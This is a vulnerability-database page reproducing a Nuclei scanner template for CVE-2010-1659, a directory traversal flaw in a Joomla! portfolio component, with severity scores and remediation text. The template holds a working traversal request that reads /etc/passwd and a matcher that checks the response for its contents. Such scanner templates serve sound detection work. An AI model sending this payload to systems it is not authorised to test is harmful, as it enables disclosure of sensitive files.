Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1659
HistoryAug 27, 2021 - 12:09 a.m.

Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

2021-08-2700:09:32
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.018 Low

EPSS

Percentile

88.2%

A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1659

info:
  name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: |
    Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component.
  reference:
    - https://www.exploit-db.com/exploits/12426
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1659
    - http://www.exploit-db.com/exploits/12426
    - http://www.vupen.com/english/advisories/2010/1008
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1659
    cwe-id: CWE-22
    epss-score: 0.01806
    epss-percentile: 0.88135
    cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: webkul
    product: com_ultimateportfolio
  tags: cve2010,cve,joomla,lfi,edb,webkul

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b0d75d2392e79829bfdf92b9806aaffe08721016c29f5e8f84e2cdfbfd700d12022100cdcc663f4843b1ee272e6c689afc5814092e36c1735e11ef0472b89bb472b7c6:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.018 Low

EPSS

Percentile

88.2%

Related for NUCLEI:CVE-2010-1659